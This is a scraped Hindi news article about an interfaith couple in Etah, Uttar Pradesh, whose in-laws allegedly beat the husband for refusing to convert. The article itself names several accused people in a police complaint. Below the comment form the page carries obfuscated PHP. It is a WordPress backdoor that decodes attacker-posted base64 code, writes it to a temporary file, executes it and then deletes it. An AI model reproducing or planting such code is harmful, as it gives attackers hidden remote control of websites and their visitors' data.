प्रेम विवाह के 3 साल बाद ससुराल वालों की जिद, मना किया तो दामाद को पीटा, बोला- मर जाऊंगा धर्म नहीं बदलूंगा

Uttarakhand Press 08 August 2023: उत्तर प्रदेश के एटा जिले के कस्बा मिरहची में प्रेम विवाह के तीन साल बाद युवक के जीवन में तूफान आया हुआ है। युवक-युवती ने तीन साल पहले हिंदू रीति-रिवाज और न्यायिक व्यवस्था के तहत प्रेम विवाह किया था। अब युवक पर धर्म परिवर्तत करने का दबाव बनाया जा रहा है। ससुराल पक्ष के लोगों ने दबाव बनाने के लिए दोनों को पीट डाला। युवक ने इसकी रिपोर्ट दर्ज कराई है।

यहां का है मामला:
कस्बे में मारहरा रोड स्थित ईदगाह के पास अनुसूचित जाति का पवन कुमार रहता है। तीन साल पहले दूसरे समुदाय की पड़ोसी युवती रूबी और उसने दिल्ली जाकर आर्य समाज मंदिर में हिंदू रीति-रिवाज से शादी की। इसके बाद से हम लोग सामान्य रूप से रहने लगे। लेकिन अब पत्नी के परिवारीजन मुझ पर धर्म परिवर्तन करने का दबाव बना रहे हैं। 27 जुलाई 2023 को धर्म बदलने की बात से इन्कार करने पर घर में घुसकर मेरे व मेरी पत्नी के साथ अभद्रता और पिटाई की।

एसएसपी से मिला पीड़ित:
पीड़ित ने बताया कि घटना की शिकायत थाने पहुंचकर पुलिस से की। लेकिन पुलिस ने मामला दर्ज नहीं किया। इसके बाद वरिष्ठ पुलिस अधीक्षक राजेश कुमार सिंह से मिला। उन्होंने थाना पुलिस को कार्रवाई के लिए आदेशित किया। उनके आदेश पर मुबीन खान, राजउद्दीन, शहरुउद्दीन, रियासत अली, अमीनुद्दीन, अमन, नूरबानो, सना, सभा, रुखसाना, फराना के विरुद्ध प्राथमिकी दर्ज कर ली गई है। जांच क्षेत्राधिकारी सदर द्वारा की जा रही है। क्षेत्राधिकारी ने बताया कि सभी पहलुओं पर मामले की जांच की जा रही है।

Read Previous

Uttarakhand: पति को लगा अवैध संबंधों का पता तो पत्नी न प्रेमी के साथ मिलकर खौफनाक तरीके से ली जान, ऐसे बनाई योजना

Read Next

‘एक दो दिन में आतंकी हमला होगा’, 61 साल के शख्स ने महाराष्ट्र मंत्रालय में फोन कर दी धमकी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}